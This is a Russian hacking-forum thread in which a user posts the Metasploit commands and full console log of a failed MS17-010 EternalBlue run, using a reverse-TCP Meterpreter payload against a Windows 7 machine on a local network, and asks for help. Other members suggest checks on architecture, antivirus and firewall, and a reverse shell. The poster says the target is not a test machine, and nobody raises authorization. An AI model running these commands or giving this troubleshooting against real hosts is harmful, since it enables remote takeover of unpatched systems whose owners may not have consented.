ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)
-   -   MS17-010. Ошибка. (https://forum.antichat.xyz/showthread.php?t=580501)

lukabroot 04.09.2022 23:21

Добрый вечер! Помогите, пожалуйста, исправить ошибку:
msf6 > use exploit/windows/smb/ms17_010_eternalblue[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.0.108
RHOST => 192.168.0.108
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.105
LHOST => 192.168.0.105
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.0.105:4444 [*] 192.168.0.108:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.108:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)[*] 192.168.0.108:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.108:445 - The target is vulnerable.[*] 192.168.0.108:445 - Connecting to target for exploitation.
[+] 192.168.0.108:445 - Connection established for exploitation.
[+] 192.168.0.108:445 - Target OS selected valid for OS indicated by SMB reply[*] 192.168.0.108:445 - CORE raw buffer dump (38 bytes)[*] 192.168.0.108:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima[*] 192.168.0.108:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] 192.168.0.108:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.0.108:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 192.168.0.108:445 - Trying exploit with 12 Groom Allocations.[*] 192.168.0.108:445 - Sending all but last fragment of exploit packet[*] 192.168.0.108:445 - Starting non-paged pool grooming
[+] 192.168.0.108:445 - Sending SMBv2 buffers
[+] 192.168.0.108:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 192.168.0.108:445 - Sending final SMBv2 buffers.[*] 192.168.0.108:445 - Sending last fragment of exploit packet![*] 192.168.0.108:445 - Receiving response from exploit packet
[+] 192.168.0.108:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 192.168.0.108:445 - Sending egg to corrupted connection.[*] 192.168.0.108:445 - Triggering free of corrupted buffer.
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[*] 192.168.0.108:445 - Connecting to target for exploitation.
[+] 192.168.0.108:445 - Connection established for exploitation.
[+] 192.168.0.108:445 - Target OS selected valid for OS indicated by SMB reply[*] 192.168.0.108:445 - CORE raw buffer dump (38 bytes)[*] 192.168.0.108:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima[*] 192.168.0.108:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] 192.168.0.108:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.0.108:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 192.168.0.108:445 - Trying exploit with 17 Groom Allocations.[*] 192.168.0.108:445 - Sending all but last fragment of exploit packet[*] 192.168.0.108:445 - Starting non-paged pool grooming
[+] 192.168.0.108:445 - Sending SMBv2 buffers
[+] 192.168.0.108:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 192.168.0.108:445 - Sending final SMBv2 buffers.[*] 192.168.0.108:445 - Sending last fragment of exploit packet![*] 192.168.0.108:445 - Receiving response from exploit packet
[+] 192.168.0.108:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 192.168.0.108:445 - Sending egg to corrupted connection.[*] 192.168.0.108:445 - Triggering free of corrupted buffer.
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[*] 192.168.0.108:445 - Connecting to target for exploitation.
[+] 192.168.0.108:445 - Connection established for exploitation.
[+] 192.168.0.108:445 - Target OS selected valid for OS indicated by SMB reply[*] 192.168.0.108:445 - CORE raw buffer dump (38 bytes)[*] 192.168.0.108:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima[*] 192.168.0.108:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] 192.168.0.108:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.0.108:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 192.168.0.108:445 - Trying exploit with 22 Groom Allocations.[*] 192.168.0.108:445 - Sending all but last fragment of exploit packet[*] 192.168.0.108:445 - Starting non-paged pool grooming
[+] 192.168.0.108:445 - Sending SMBv2 buffers
[+] 192.168.0.108:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 192.168.0.108:445 - Sending final SMBv2 buffers.[*] 192.168.0.108:445 - Sending last fragment of exploit packet![*] 192.168.0.108:445 - Receiving response from exploit packet
[!] 192.168.0.108:445 - ETERNALBLUE overwrite returned unexpected status code (0xC0000205)![*] 192.168.0.108:445 - Sending egg to corrupted connection.[*] 192.168.0.108:445 - Triggering free of corrupted buffer.
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[*] Exploit completed, but no session was created.

Rook 05.09.2022 00:17

aux'ом проверял хост на уязвимость ?

lukabroot 05.09.2022 10:02

Цитата:


Rook сказал(а):

aux'ом проверял хост на уязвимость ?


Да, nessusОМ

Rook 05.09.2022 16:39

Цитата:


lukabroot сказал(а):

Да, nessusОМ


А винда подопытная которая, х64 или х86 ?

lukabroot 05.09.2022 16:54

Цитата:


Rook сказал(а):

А винда подопытная которая, х64 или х86 ?


x64 , не подопытная

Rook 05.09.2022 17:59

Цитата:


lukabroot сказал(а):

x64 , не подопытная


Тогда возможно антивирус либо брандмауэр блокирует.

lukabroot 05.09.2022 20:02

Цитата:


Rook сказал(а):

Тогда возможно антивирус либо брандмауэр блокирует.


Цитата:


Rook сказал(а):

Тогда возможно антивирус либо брандмауэр блокирует.


нету, брандмауэр я отключил

New User1323 01.05.2023 15:03

Reverse shell попробуй. Должно помочь.


Время: 00:21